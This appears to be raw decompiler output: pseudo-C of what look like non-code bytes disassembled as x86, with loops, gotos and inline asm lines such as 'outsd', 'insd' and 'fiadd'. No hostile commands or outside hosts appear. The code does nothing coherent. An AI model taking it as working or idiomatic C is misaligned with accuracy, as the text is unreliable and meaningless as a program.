                                            				signed char _t1286;
                                            				signed char _t1292;
                                            				void* _t1302;
                                            				signed char _t1304;
                                            				intOrPtr* _t1305;
                                            				signed char _t1307;
                                            				intOrPtr* _t1308;
                                            				signed char _t1309;
                                            				signed int* _t1368;
                                            				void* _t1371;
                                            				signed int _t1385;
                                            				signed char _t1386;
                                            				signed char _t1387;
                                            				signed char _t1388;
                                            				signed int* _t1389;
                                            				void* _t1395;
                                            				void* _t1396;
                                            				intOrPtr* _t1397;
                                            				void* _t1406;
                                            				void* _t1407;
                                            				intOrPtr _t1421;
                                            				intOrPtr _t1426;
                                            				intOrPtr _t1432;
                                            				void* _t1437;
                                            				signed char _t1440;
                                            				void* _t1462;
                                            				void* _t1472;
                                            				void* _t1482;
                                            				signed char _t1516;
                                            				void* _t1524;
                                            				intOrPtr* _t1539;
                                            
                                            				_t1385 = __esi;
                                            				_t1368 = __edi;
                                            				_t1293 = __edx;
                                            				_t1087 = __ebx;
                                            				_t669 = __eax + 2;
                                            				 *__esi =  *__esi - __edx;
                                            				 *_t669 =  *_t669 + _t669;
                                            				_t1131 = __ecx |  *__edx;
                                            				 *_t669 =  *_t669 + _t669;
                                            				asm("adc esi, [eax]");
                                            				 *_t669 =  *_t669 | _t669;
                                            				asm("movsd");
                                            				_t670 = _t669 +  *_t669;
                                            				 *__ebx =  *__ebx + _t1131;
                                            				 *_t670 =  *_t670 + _t670;
                                            				asm("adc [edx], eax");
                                            				 *((intOrPtr*)(_t1131 + 0x20a0000)) =  *((intOrPtr*)(_t1131 + 0x20a0000)) - _t670;
                                            				 *((intOrPtr*)(__edx + 0x730a0000)) =  *((intOrPtr*)(__edx + 0x730a0000)) - _t670;
                                            				 *0xa0a0000 = _t670;
                                            				while(1) {
                                            					L1:
                                            					 *_t670 =  *_t670 + _t670;
                                            					_t1132 = _t1131 |  *_t1293;
                                            					_push(es);
                                            					 *((intOrPtr*)(_t670 + _t670 + 0x120b0a00)) =  *((intOrPtr*)(_t670 + _t670 + 0x120b0a00)) - _t670;
                                            					_t1293 = _t1293 +  *_t1385;
                                            					_push(ss);
                                            					_t1133 = _t1132 +  *_t670;
                                            					_t671 =  *0x170a0000;
                                            					asm("fiadd dword [edx]");
                                            					0x170a0000[_t1293] = 0x170a0000[_t1293] - _t671;
                                            					asm("fisubr dword [eax]");
                                            					asm("movsd");
                                            					 *_t671 =  *_t671 + _t671;
                                            					_t672 = _t671 |  *_t1293;
                                            					_t1395 = _t1395 +  *_t672;
                                            					asm("cmpsb");
                                            					 *_t672 =  *_t672 + _t672;
                                            					while(1) {
                                            						_t673 = _t672 |  *_t1368;
                                            						asm("sbb [edi-0x58], ch");
                                            						 *_t673 =  *_t673 + _t673;
                                            						_t674 = _t673 |  *_t1368;
                                            						 *_t674 =  *_t674 + _t674;
                                            						 *_t674 =  *_t674 + _t674;
                                            						_t675 = _t674 |  *_t674;
                                            						asm("adc [esi+0x1b5282a], dl");
                                            						 *_t1385 =  *_t1385 + _t675;
                                            						_t670 = _t675 &  *_t675;
                                            						 *_t670 =  *_t670 + _t1293;
                                            						_t1131 = (_t1133 + _t1368[9] |  *(_t1368 - 0x59)) + 1;
                                            						_push(ss);
                                            						if(_t1131 >= 0) {
                                            							goto L1;
                                            						}
                                            						 *_t670 =  *_t670 + _t670;
                                            						_t1136 = _t1131 |  *0x9d20;
                                            						 *_t1368 =  *_t1368 + _t1087;
                                            						if( *_t1368 > 0) {
                                            							 *((intOrPtr*)(_t1395 + _t1385)) =  *((intOrPtr*)(_t1395 + _t1385)) - _t1087;
                                            							 *_t1293 =  *_t1293 + _t1136;
                                            							_t672 = _t670 &  *_t670;
                                            							 *((intOrPtr*)(_t672 + 0x16c733f)) =  *((intOrPtr*)(_t672 + 0x16c733f)) + _t672;
                                            							 *_t1293 =  *_t1293 + _t1136;
                                            							asm("adc eax, [edi+ebx]");
                                            							ds = _t1385;
                                            							asm("insd");
                                            							_pop(ds);
                                            							asm("insd");
                                            							 *_t1293 =  *_t1293 - _t1087;
                                            							L5:
                                            							 *_t1293 =  *_t1293 + _t1133;
                                            							if( *_t1293 >= 0) {
                                            								continue;
                                            							}
                                            						}
                                            						 *_t670 =  *_t670 + _t670;
                                            						_t1293 = _t1293 |  *_t1087;
                                            						_t676 = _t670 + 0x827b02;
                                            						 *((intOrPtr*)(_t1087 + _t1293)) =  *((intOrPtr*)(_t1087 + _t1293)) + _t676;
                                            						asm("adc [esi], eax");
                                            						_t1395 = _t1395 + 1;
                                            						_t677 = _t676 +  *_t676;
                                            						 *_t677 =  *_t677 + _t677;
                                            						_t678 = _t677 + 0x98000000;
                                            						 *_t678 =  &(_t678[ *_t678]);
                                            						 *_t1385 =  *_t1385 + _t1136;
                                            						 *_t678 =  &(_t678[ *_t678]);
                                            						 *_t678 =  *_t678 + _t1087;
                                            						asm("scasb");
                                            						 *_t678 =  &(_t678[ *_t678]);
                                            						 *_t678 =  *_t678 + _t1136;
                                            						_t1137 = _t1136 & _t1087;
                                            						 *_t678 =  &(_t678[ *_t678]);
                                            						 *_t678 =  &(_t678[ *_t678]);
                                            						 *0x20000000 = _t678;
                                            						 *_t678 =  *_t678;
                                            						 *_t678 =  *_t678 + _t1137;
                                            						if ( *_t678 != 0) goto L7;
                                            						 *_t1293 =  *_t1293 + _t1137;
                                            						_t1133 = _t1137;
                                            						 *_t678 =  &(_t678[ *_t678]);
                                            						 *_t678 =  &(_t678[ *_t678]);
                                            						_t679 =  *_t678;
                                            						 *_t679 =  *_t679 + _t679;
                                            						ds = es;
                                            						asm("arpl [eax], bp");
                                            						if ( *_t679 != 0) goto L8;
                                            						 *_t1293 =  *_t1293 + _t1133;
                                            						_t672 = _t679 &  *_t679;
                                            						_t19 = _t1293 + 0xaa73 + _t672 * 2;
                                            						 *_t19 =  *((intOrPtr*)(_t1293 + 0xaa73 + _t672 * 2)) + _t1293;
                                            						_t1421 =  *_t19;
                                            						L9:
                                            						while(_t1421 < 0) {
                                            							 *_t672 =  *_t672 + _t672;
                                            							_pop(es);
                                            							_pop(es);
                                            							asm("adc [edi], eax");
                                            							 *_t1133 =  *_t1133 | _t1087;
                                            							 *((intOrPtr*)(_t1133 + _t672 - 0x5490fa00)) =  *((intOrPtr*)(_t1133 + _t672 - 0x5490fa00)) - _t672;
                                            							 *_t672 =  *_t672 + _t672;
                                            							_t680 = _t672 |  *_t1368;
                                            							asm("adc [eax+ecx], eax");
                                            							asm("sbb [eax], ebp");
                                            							 *_t1385 =  *_t1385 + _t680;
                                            							asm("outsd");
                                            							asm("scasb");
                                            							 *_t680 =  *_t680 + _t680;
                                            							 *(_t680 |  *_t1368) =  *(_t680 |  *_t1368) + (_t680 |  *_t1368);
                                            							_t1139 = _t1133 +  *((intOrPtr*)(_t1368 - 0x4f)) |  *(_t1133 +  *((intOrPtr*)(_t1368 - 0x4f)));
                                            							asm("adc [0x28021616], eax");
                                            							_t672 =  *0x170a0000;
                                            							asm("fiadd dword [edx]");
                                            							0x170a0000[_t1293 |  *_t1087] = 0x170a0000[_t1293 |  *_t1087] - _t672;
                                            							asm("fidiv dword [ebx-0x5b]");
                                            							while(1) {
                                            								asm("movsd");
                                            								 *_t672 =  *_t672 + _t672;
                                            								_t1133 = _t1139 |  *_t672;
                                            								_t1293 = 0;
                                            								 *0 =  *0 + _t1133;
                                            								if( *0 >= 0) {
                                            									goto L9;
                                            								}
                                            								 *_t672 =  *_t672 + _t672;
                                            								 *0 =  *0 + _t1133;
                                            								_t683 = (_t672 |  *0xb46f17) & 0x00b56f17;
                                            								 *0 =  *0 + _t1133;
                                            								asm("outsd");
                                            								 *0 =  *0 + _t1133;
                                            								 *_t683 =  *_t683 + _t683;
                                            								 *_t683 =  *_t683 + _t1133;
                                            								_t1088 = _t1087;
                                            								 *_t683 =  *_t683 + _t683;
                                            								 *_t683 =  *_t683 + _t683;
                                            								_t1296 = 0x20000000;
                                            								asm("cdq");
                                            								 *_t683 =  *_t683 + _t683;
                                            								 *_t683 =  *_t683 + _t1133;
                                            								if ( *_t683 != 0) goto L13;
                                            								 *0x20000000 =  &(( *0x20000000)[_t1133]);
                                            								_t1087 = _t1088;
                                            								 *_t683 =  *_t683 + _t683;
                                            								 *_t683 =  *_t683 + _t683;
                                            								asm("stosd");
                                            								 *_t683 =  *_t683 + _t683;
                                            								 *_t683 =  *_t683 + _t683;
                                            								_t684 =  *_t683;
                                            								 *_t684 = _t683;
                                            								 *_t684 =  *_t684 + _t684;
                                            								 *0x20000000 =  *0x20000000 - _t1087;
                                            								 *0x20000000 =  &(( *0x20000000)[_t1133]);
                                            								_t672 = _t684 &  *_t684;
                                            								_t35 = 0x20000000 + 0xaa73 + _t672 * 2;
                                            								 *_t35 =  *((intOrPtr*)(0x20000000 + 0xaa73 + _t672 * 2));
                                            								_t1426 =  *_t35;
                                            								L14:
                                            								while(_t1426 < 0) {
                                            									 *_t672 =  *_t672 + _t672;
                                            									_t1297 = _t1296 |  *_t1087;
                                            									 *_t1368 =  *_t1368 | _t672;
                                            									asm("adc [eax], ecx");
                                            									 *_t1133 =  *_t1133 | _t1087;
                                            									 *((intOrPtr*)(_t1133 + _t672 - 0x5490fa00)) =  *((intOrPtr*)(_t1133 + _t672 - 0x5490fa00)) - _t672;
                                            									 *_t672 =  *_t672 + _t672;
                                            									_t685 = _t672 |  *_t1368;
                                            									asm("adc [eax+ecx], eax");
                                            									asm("sbb [eax], ebp");
                                            									 *_t1385 =  *_t1385 + _t685;
                                            									asm("outsd");
                                            									asm("scasb");
                                            									 *_t685 =  *_t685 + _t685;
                                            									 *(_t685 |  *_t1368) =  *(_t685 |  *_t1368) + (_t685 |  *_t1368);
                                            									_t1141 = _t1133 +  *((intOrPtr*)(_t1368 - 0x4f)) |  *(_t1133 +  *((intOrPtr*)(_t1368 - 0x4f)));
                                            									asm("adc [0x28021616], eax");
                                            									_t672 =  *0x170a0000;
                                            									while(1) {
                                            										asm("fiadd dword [edx]");
                                            										0x170a0000[_t1297 |  *_t1368] = 0x170a0000[_t1297 |  *_t1368] - _t672;
                                            										asm("fidiv dword [ebx-0x5b]");
                                            										 *_t672 =  *_t672 + _t672;
                                            										_t1139 = _t1141 |  *_t672;
                                            										_t1296 = 0;
                                            										 *0 =  *0 + _t1139;
                                            										if( *0 >= 0) {
                                            											goto L14;
                                            										}
                                            										 *_t672 =  *_t672 + _t672;
                                            										 *0 =  *0 + _t1139;
                                            										 *0 =  *0 + _t1139;
                                            										asm("outsd");
                                            										_t1299 = 0;
                                            										 *0 =  *0 + _t1139;
                                            										_t689 = (_t672 |  *0xb46f17) & 0x00b56f17 & _t1139;
                                            										 *_t689 =  *_t689 + _t689;
                                            										 *_t1368 =  *_t1368 + _t1087;
                                            										if( *_t1368 != 0) {
                                            											 *0 =  *0 - _t1087;
                                            											 *0 =  *0 + _t1139;
                                            											_t1297 = 0x00000000 & _t689;
                                            											 *_t689 =  *_t689 + _t689;
                                            											 *_t1368 =  *_t1368 + _t1087;
                                            											ds = _t1087;
                                            											_t1141 = _t1139 + 1;
                                            											 *_t1297 =  *_t1297 - _t1087;
                                            											 *_t1297 =  *_t1297 + _t1141;
                                            											_t672 = _t689 &  *_t689;
                                            											_t51 = _t1297 + 0xaa73 + _t672 * 2;
                                            											 *_t51 =  *((intOrPtr*)(_t1297 + 0xaa73 + _t672 * 2));
                                            											_t1432 =  *_t51;
                                            											L19:
                                            											if(_t1432 >= 0) {
                                            												continue;
                                            											} else {
                                            												 *_t672 =  *_t672 + _t672;
                                            												_t1299 = _t1297 |  *_t1087;
                                            											}
                                            										}
                                            										 *_t1368 =  *_t1368 | _t689;
                                            										asm("adc [ecx], ecx");
                                            										 *_t1139 =  *_t1139 | _t1087;
                                            										 *((intOrPtr*)(_t1139 + _t689 - 0x5490fa00)) =  *((intOrPtr*)(_t1139 + _t689 - 0x5490fa00)) - _t689;
                                            										 *_t689 =  *_t689 + _t689;
                                            										_t690 = _t689 |  *_t1368;
                                            										asm("adc [eax+ecx], eax");
                                            										asm("sbb [eax], ebp");
                                            										 *_t1385 =  *_t1385 + _t690;
                                            										asm("outsd");
                                            										asm("scasb");
                                            										 *_t690 =  *_t690 + _t690;
                                            										 *(_t690 |  *_t1368) =  *(_t690 |  *_t1368) + (_t690 |  *_t1368);
                                            										asm("adc [0x28021616], eax");
                                            										_t672 =  *0x170a0000;
                                            										asm("fiadd dword [edx]");
                                            										0x170a0000[_t1299] = 0x170a0000[_t1299] - _t672;
                                            										asm("fidiv dword [ebx-0x5b]");
                                            										 *_t672 =  *_t672 + _t672;
                                            										_t1141 = _t1139 +  *((intOrPtr*)(_t1368 - 0x4f)) |  *(_t1139 +  *((intOrPtr*)(_t1368 - 0x4f))) |  *_t672;
                                            										_t1297 = 0;
                                            										 *0 =  *0 + _t1141;
                                            										if( *0 >= 0) {
                                            											goto L19;
                                            										}
                                            										 *_t672 =  *_t672 + _t672;
                                            										 *0 =  *0 + _t1141;
                                            										_t693 = (_t672 |  *0xb46f17) & 0x00b56f17;
                                            										 *0 =  *0 + _t1141;
                                            										asm("outsd");
                                            										 *0 =  *0 + _t1141;
                                            										_t1396 = _t1395 +  *((intOrPtr*)(_t1368 - 0x49));
                                            										 *_t693 =  *_t693 + _t693;
                                            										_t1302 =  *_t693;
                                            										_t694 = _t1385;
                                            										_t1386 = _t693;
                                            										_t1145 = 1;
                                            										 *_t1386 =  *_t1386 + _t694;
                                            										asm("sbb [ebp+0x1000073], ecx");
                                            										_t695 = _t694 & 0xb86f0616;
                                            										 *_t695 =  *_t695 + _t695;
                                            										_t696 = _t695 |  *(_t1302 - 0x73e9e8db);
                                            										asm("insb");
                                            										 *_t696 =  *_t696 + _t696;
                                            										 *((intOrPtr*)(_t1302 - 0x73e9e7db)) =  *((intOrPtr*)(_t1302 - 0x73e9e7db)) + _t1406;
                                            										asm("insb");
                                            										 *_t696 =  *_t696 + _t696;
                                            										 *((intOrPtr*)(_t1302 + 0x17141414)) =  *((intOrPtr*)(_t1302 + 0x17141414)) + _t1406;
                                            										 *0x260A0001 =  *((intOrPtr*)(0x260a0001)) - _t1087;
                                            										_pop(es);
                                            										asm("outsd");
                                            										asm("outsd");
                                            										 *_t696 =  *_t696 + _t696;
                                            										 *((intOrPtr*)(_t1386 + 2)) =  *((intOrPtr*)(_t1386 + 2)) + 0x2a0a0000;
                                            										 *0x20a0000 =  *0x20a0000 - _t696;
                                            										_t1090 = 0x2a0a0000;
                                            										_push(es);
                                            										if(0x2a0a0000 >= 0) {
                                            											 *_t1386 =  *_t1386 + _t696;
                                            											_t1437 =  *_t1386;
                                            										}
                                            										_push(es);
                                            										if(_t1437 < 0) {
                                            											 *_t696 =  *_t696 + _t696;
                                            											_t1145 = _t1145 |  *_t696;
                                            											asm("daa");
                                            											 *_t696 =  *_t696 + _t696;
                                            											_t1085 = _t696 |  *0x60a0000;
                                            											 *((intOrPtr*)(_t1145 + 1)) =  *((intOrPtr*)(_t1145 + 1)) - 0x60a0000;
                                            											 *_t1386 =  *_t1386 + _t1085;
                                            											_t1129 = _t1090 -  *_t1090;
                                            											 *0x60a0000 =  *0x60a0000 ^ _t1085;
                                            											 *_t1145 =  *_t1145 + _t1145;
                                            											 *_t1085 =  *_t1085 + _t1085;
                                            											 *_t1129 =  *_t1129 + _t1085;
                                            											 *_t1085 =  *_t1085 + _t1085;
                                            											asm("adc [ebx], eax");
                                            											_t1086 = _t1085 - 0xb;
                                            											_t1090 = _t1129 +  *((intOrPtr*)(_t1129 - 0x7d));
                                            											 *_t1086 =  *_t1086 + _t1086;
                                            											_t696 = _t1086 + 0x14;
                                            											 *_t1090 =  *_t1090 + 1;
                                            										}
                                            										_t1397 = _t1396 +  *_t1090;
                                            										 *_t1386 = 0x60a0000 +  *_t1386;
                                            										_t698 = (_t696 |  *_t1386) - 0xb;
                                            										_t1091 = _t1090 +  *((intOrPtr*)(_t1090 - 0x7d));
                                            										 *_t698 =  *_t698 + _t698;
                                            										_t699 = _t698 + 0x6f;
                                            										 *_t699 =  *_t699 - _t699;
                                            										 *0x60a0000 =  *0x60a0000 + _t1145;
                                            										asm("fimul word [eax]");
                                            										_t700 = _t699 +  *_t1091;
                                            										 *_t1145 =  *_t1145 - _t1145;
                                            										 *_t700 =  *_t700 + _t700;
                                            										_t1092 = _t1091 | _t700;
                                            										_t701 = _t700 -  *_t700;
                                            										_t1304 = 0x060a0000 |  *_t1368;
                                            										 *_t701 =  *_t701 + _t1304;
                                            										 *_t701 =  *_t701 + _t701;
                                            										_t702 = _t701 +  *_t701;
                                            										 *_t702 =  *_t702 + _t702;
                                            										 *_t702 =  *_t702 & _t702;
                                            										 *_t702 =  *_t702 + _t1145;
                                            										 *_t702 =  *_t702 + _t702;
                                            										 *_t702 =  *_t702 + _t702;
                                            										asm("adc esi, [eax]");
                                            										_push(es);
                                            										 *((intOrPtr*)(_t1092 + _t702 + 0x40000)) =  *((intOrPtr*)(_t1092 + _t702 + 0x40000)) + _t1304;
                                            										 *_t1145 =  *_t1145 + _t1304;
                                            										 *_t1092 =  *_t1092 << 1;
                                            										 *_t702 =  *_t702 + _t702;
                                            										_t1146 = _t1145 +  *_t702;
                                            										_t703 = _t702 -  *_t702;
                                            										 *_t1304 =  *_t1304 + _t1146;
                                            										if( *_t1304 < 0) {
                                            											 *_t703 =  *_t703 + _t703;
                                            											 *_t703 =  *_t703 + _t703;
                                            											 *_t703 =  *_t703 + _t703;
                                            											_push(es);
                                            											 *_t703 =  *_t703 + _t703;
                                            											 *_t703 =  *_t703 + _t703;
                                            											_push(es);
                                            											 *_t703 =  *_t703 + _t703;
                                            											_t1292 = _t1146 |  *_t1304 | _t1368[0x1c] | _t1368[0x1d] | _t1368[0x1d];
                                            											 *_t703 =  *_t703 + _t703;
                                            											_push(es);
                                            											_t1304 = _t1304 +  *((intOrPtr*)(_t1092 + 0x2e)) +  *((intOrPtr*)(_t1092 + 0x2c)) +  *((intOrPtr*)(_t1092 + 0x6d)) +  *((intOrPtr*)(_t1092 + 0x31));
                                            											 *_t703 =  *_t703 + _t703;
                                            											_t1146 = _t1292 | _t1368[0x1e];
                                            											_t1440 = _t1146;
                                            										}
                                            										asm("outsd");
                                            										if(_t1440 < 0) {
                                            											 *_t1386 =  *_t1386 + _t703;
                                            										}
                                            										_push(es);
                                            										_t1305 = _t1304 +  *((intOrPtr*)(_t1092 + 0x2d));
                                            										 *_t703 =  *_t703 + _t703;
                                            										 *_t703 =  *_t703 + _t703;
                                            										_push(es);
                                            										 *_t703 =  *_t703 + _t703;
                                            										_push(es);
                                            										asm("outsd");
                                            										 *_t1305 =  *_t1305 + (_t1146 | _t1368[0x1e]) + _t1368[0x1c];
                                            										_t705 = _t703 ^ 0x20a0000;
                                            										asm("outsd");
                                            										if(_t705 >= 0) {
                                            											 *_t1386 =  *_t1386 + _t705;
                                            										}
                                            										_push(es);
                                            										_push(es);
                                            										_t706 = _t705 & _t1092;
                                            										asm("sbb al, 0x96");
                                            										 *_t1386 =  *_t1386 + _t706;
                                            										asm("outsd");
                                            										 *_t706 =  *_t706 + _t706;
                                            										_t1307 = _t1305 + 0x00000001 |  *(_t1305 + 1 + (_t1305 + 1) * 2);
                                            										 *1 =  *1 + _t706;
                                            										asm("outsd");
                                            										_t1093 = _t1092 + 1;
                                            										 *_t706 =  *_t706 + _t706;
                                            										_t707 = _t706 |  *_t1307;
                                            										asm("outsd");
                                            										if(_t707 >= 0) {
                                            											 *_t1386 =  *_t1386 + _t707;
                                            										}
                                            										ds = es;
                                            										_t709 = _t707 | 0x7f;
                                            										 *_t1307 =  *_t1307 + 1;
                                            										asm("outsd");
                                            										 *_t1307 =  *_t1307 + 1;
                                            										 *_t709 =  *_t709 + _t709;
                                            										_t710 = _t709;
                                            										asm("sbb al, 0x96");
                                            										 *_t1386 =  *_t1386 + _t710;
                                            										asm("outsd");
                                            										 *_t1307 =  *_t1307 + 1;
                                            										_t1155 = 1 + _t1368[0x1c];
                                            										 *_t710 =  *_t710 + _t710;
                                            										ds = es;
                                            										ds = _t1406;
                                            										_t1407 = es;
                                            										if( *_t710 >= 0) {
                                            											L44:
                                            											 *_t1386 =  *_t1386 + _t710;
                                            										} else {
                                            											 *_t710 =  *_t710 + _t710;
                                            											_t1155 = _t1155 | _t1368[0xf];
                                            											 *_t710 =  *_t710 + _t710;
                                            											_t1081 = _t710 |  *_t1307;
                                            											asm("outsd");
                                            											if(_t1081 >= 0) {
                                            												 *_t1386 =  *_t1386 + _t1081;
                                            											}
                                            											_push(es);
                                            											asm("sbb ch, [edi+0x44]");
                                            											 *_t1081 =  *_t1081 + _t1081;
                                            											_t1082 = _t1081 |  *_t1307;
                                            											asm("outsd");
                                            											if(_t1082 >= 0) {
                                            												 *_t1386 =  *_t1386 + _t1082;
                                            											}
                                            											_push(es);
                                            											asm("sbb [edi+0x45], ch");
                                            											 *_t1082 =  *_t1082 + _t1082;
                                            											_t1083 = _t1082 |  *_t1307;
                                            											asm("outsd");
                                            											if(_t1083 >= 0) {
                                            												 *_t1386 =  *_t1386 + _t1083;
                                            											}
                                            											_push(es);
                                            											_push(ss);
                                            											asm("outsd");
                                            											_t1386 = _t1386 + 1;
                                            											 *_t1083 =  *_t1083 + _t1083;
                                            											_t1084 = _t1083 |  *_t1307;
                                            											asm("outsd");
                                            											if(_t1084 != 0) {
                                            												 *_t1386 =  *_t1386 + _t1084;
                                            											}
                                            											ss = es;
                                            											asm("outsd");
                                            											 *[ss:eax] =  *[ss:eax] + _t1084;
                                            											_t710 = _t1084 |  *_t1307;
                                            											asm("outsd");
                                            											if(_t710 != 0) {
                                            												goto L44;
                                            											}
                                            										}
                                            										_push(es);
                                            										 *(_t1155 + 0x1c) =  *(_t1155 + 0x1c) & _t1093;
                                            										_t711 = _t1386;
                                            										_t1387 = _t710;
                                            										_t1157 = 1;
                                            										 *_t1387 =  *_t1387 + _t711;
                                            										_t712 = _t711 &  *_t711;
                                            										_t105 = 1 + 0x16 + _t712 * 2;
                                            										 *_t105 =  *((intOrPtr*)(1 + 0x16 + _t712 * 2)) + _t712;
                                            										asm("sbb [esi], edx");
                                            										if( *_t105 >= 0) {
                                            											L52:
                                            											_t1093 = _t1093 & _t1157;
                                            											 *_t712 =  *_t712 + _t712;
                                            											 *_t1368 =  *_t1368 + _t1093;
                                            											asm("sbb [ebx+0x3c], dh");
                                            											 *_t712 =  *_t712 + _t712;
                                            											_t1158 = _t1157 | _t1368[0xf];
                                            											 *_t712 =  *_t712 + _t712;
                                            											_t713 = _t712 |  *_t1307;
                                            											asm("outsd");
                                            											if(_t713 != 0) {
                                            												 *_t1387 =  *_t1387 + _t713;
                                            											}
                                            										} else {
                                            											 *_t712 =  *_t712 + _t712;
                                            											_t1158 = 0x00000001 | _t1368[0xe];
                                            											 *_t712 =  *_t712 + _t712;
                                            											_t713 = _t712 |  *_t1307;
                                            											asm("outsd");
                                            											if(_t713 != 0) {
                                            												 *_t1387 =  *_t1387 + _t713;
                                            												_t1462 =  *_t1387;
                                            											}
                                            											ds = es;
                                            											asm("o16 pop ds");
                                            											_push(ss);
                                            											if(_t1462 < 0) {
                                            												 *_t713 =  *_t713 + _t713;
                                            												 *_t713 =  *_t713 + _t713;
                                            												_t712 = _t713 |  *_t1307;
                                            												asm("outsd");
                                            												if(_t712 != 0) {
                                            													 *_t1387 =  *_t1387 + _t712;
                                            												}
                                            												_push(es);
                                            												 *0x282a961c =  *0x282a961c & _t1307;
                                            												 *_t1387 =  *_t1387 + _t712;
                                            												asm("outsd");
                                            												 *_t1307 =  *_t1307 + 1;
                                            												_t1157 = 1 + _t1368[0x1d];
                                            												 *_t712 =  *_t712 + _t712;
                                            												_push(es);
                                            												goto L52;
                                            											}
                                            										}
                                            										_push(es);
                                            										asm("sbb [edi+0x3e], ebp");
                                            										 *_t713 =  *_t713 + _t713;
                                            										_t714 = _t713 |  *_t1307;
                                            										asm("outsd");
                                            										if(_t714 != 0) {
                                            											 *_t1387 =  *_t1387 + _t714;
                                            										}
                                            										_push(es);
                                            										 *(_t714 + 0x11) =  *(_t714 + 0x11) & _t1158;
                                            										_t715 = _t1387;
                                            										_t1388 = _t714;
                                            										_t1160 = 1;
                                            										 *_t1388 =  *_t1388 + _t715;
                                            										asm("outsd");
                                            										asm("aas");
                                            										 *_t715 =  *_t715 + _t715;
                                            										_t716 = _t715 |  *_t1307;
                                            										asm("outsd");
                                            										if(_t716 > 0) {
                                            											 *_t1388 =  *_t1388 + _t716;
                                            											_t1472 =  *_t1388;
                                            										}
                                            										ds = es;
                                            										_push(0x1f);
                                            										asm("aaa");
                                            										if(_t1472 >= 0) {
                                            											L64:
                                            											_push(es);
                                            											asm("sbb [edi+0x6e], ch");
                                            											 *_t716 =  *_t716 + _t716;
                                            											_t717 = _t716 |  *_t1307;
                                            											asm("outsd");
                                            											if(_t717 > 0) {
                                            												 *_t1388 =  *_t1388 + _t717;
                                            											}
                                            											_push(es);
                                            											asm("sbb ch, [edi+0x3e]");
                                            											 *_t717 =  *_t717 + _t717;
                                            											_t718 = _t717 |  *_t1307;
                                            											asm("outsd");
                                            											if(_t718 >= 0) {
                                            												 *_t1388 =  *_t1388 + _t718;
                                            												_t1482 =  *_t1388;
                                            											}
                                            											ds = es;
                                            											_push(0x1f);
                                            											_push(_t1407);
                                            											if(_t1482 < 0) {
                                            												 *_t718 =  *_t718 + _t718;
                                            												_t1285 = _t1160 | _t1368[0xe];
                                            												 *_t718 =  *_t718 + _t718;
                                            												_t1079 = _t718 |  *_t1307;
                                            												asm("outsd");
                                            												if(_t1079 >= 0) {
                                            													 *_t1388 =  *_t1388 + _t1079;
                                            												}
                                            												ds = es;
                                            												asm("adc al, 0x1f");
                                            												goto L72;
                                            											}
                                            										} else {
                                            											 *_t716 =  *_t716 + _t716;
                                            											_t1286 = _t1160 | _t1368[0xe];
                                            											 *_t716 =  *_t716 + _t716;
                                            											_t1080 = _t716 |  *_t1307;
                                            											asm("outsd");
                                            											if(_t1080 > 0) {
                                            												 *_t1388 =  *_t1388 + _t1080;
                                            											}
                                            											_push(es);
                                            											 *_t1388 =  *_t1388 & _t1286;
                                            											asm("adc [esi+0x1b5282a], edx");
                                            											 *_t1388 =  *_t1388 + _t1080;
                                            											asm("outsd");
                                            											 *_t1307 =  *_t1307 + _t1286;
                                            											_t1285 = _t1286 + _t1368[0x1d];
                                            											 *_t1080 =  *_t1080 + _t1080;
                                            											_t1079 = _t1080 & _t1307;
                                            											 *_t1079 =  *_t1079 + _t1079;
                                            											 *_t1368 =  *_t1368 + _t1093;
                                            											ss = es;
                                            											if( *_t1368 >= 0) {
                                            												L72:
                                            												_pop(ds);
                                            												asm("adc al, 0x73");
                                            												 *_t1307 =  *_t1307 + _t1285;
                                            												asm("outsd");
                                            												_push(_t1307);
                                            												 *_t1079 =  *_t1079 + _t1079;
                                            												_t718 = _t1079 |  *_t1307;
                                            												asm("outsd");
                                            												if(_t718 >= 0) {
                                            													 *_t1388 =  *_t1388 + _t718;
                                            												}
                                            												_push(es);
                                            												_t1307 = _t1307 & _t1093;
                                            												asm("sbb eax, 0xb5282a96");
                                            												 *_t718 =  *_t718 + _t718;
                                            												_push(es);
                                            												asm("outsd");
                                            												 *_t1307 =  *_t1307 + _t1285;
                                            												_t1160 = _t1285 + _t1368[0x1e];
                                            												 *_t718 =  *_t718 + _t718;
                                            												ss = es;
                                            												asm("outsd");
                                            											} else {
                                            												 *_t1079 =  *_t1079 + _t1079;
                                            												_t1160 = _t1285 | _t1368[0xf];
                                            												 *_t1079 =  *_t1079 + _t1079;
                                            												_t716 = _t1079 |  *_t1307;
                                            												asm("outsd");
                                            												if(_t716 > 0) {
                                            													 *_t1388 =  *_t1388 + _t716;
                                            												}
                                            												goto L64;
                                            											}
                                            										}
                                            										_push(_t1093);
                                            										 *_t718 =  *_t718 + _t718;
                                            										_t719 = _t718 |  *_t1307;
                                            										asm("outsd");
                                            										if(_t719 >= 0) {
                                            											 *_t1388 =  *_t1388 + _t719;
                                            										}
                                            										ds = es;
                                            										asm("adc al, 0x1f");
                                            										asm("adc al, 0x73");
                                            										 *_t1307 =  *_t1307 + _t1160;
                                            										asm("outsd");
                                            										asm("outsd");
                                            										if(_t719 >= 0x20a0000) {
                                            											 *_t1388 =  *_t1388 + _t719;
                                            										}
                                            										_push(es);
                                            										asm("sbb ebp, [edi+0x3e]");
                                            										 *_t719 =  *_t719 + _t719;
                                            										_t720 = _t719 |  *_t1307;
                                            										asm("outsd");
                                            										if(_t720 >= 0) {
                                            											 *_t1388 =  *_t1388 + _t720;
                                            										}
                                            										_push(es);
                                            										_push(ss);
                                            										asm("outsd");
                                            										_push(_t1397);
                                            										 *_t720 =  *_t720 + _t720;
                                            										_t721 = _t720 |  *_t1307;
                                            										asm("outsd");
                                            										if(_t721 == 0) {
                                            											 *_t1388 =  *_t1388 + _t721;
                                            										}
                                            										_push(es);
                                            										_t722 = _t721 & _t1093;
                                            										 *_t722 =  *_t722 + _t722;
                                            										 *_t1368 =  *_t1368 + _t1093;
                                            										_push(_t1407);
                                            										if( *_t1368 < 0) {
                                            											 *_t722 =  *_t722 + _t722;
                                            											_t1284 = _t1160 | _t1368[0xe];
                                            											 *_t722 =  *_t722 + _t722;
                                            											_t722 = _t722 |  *_t1307;
                                            											asm("outsd");
                                            											if(_t722 == 0) {
                                            												 *_t1388 =  *_t1388 + _t722;
                                            											}
                                            											 *_t1093 =  *_t1093 & _t1307;
                                            											asm("adc [esi+0x1b5282a], edx");
                                            											 *_t1388 =  *_t1388 + _t722;
                                            											asm("outsd");
                                            											 *_t1307 =  *_t1307 + _t1284;
                                            											_t1160 = _t1284 + _t1368[0x1e];
                                            											 *_t722 =  *_t722 + _t722;
                                            											ds = es;
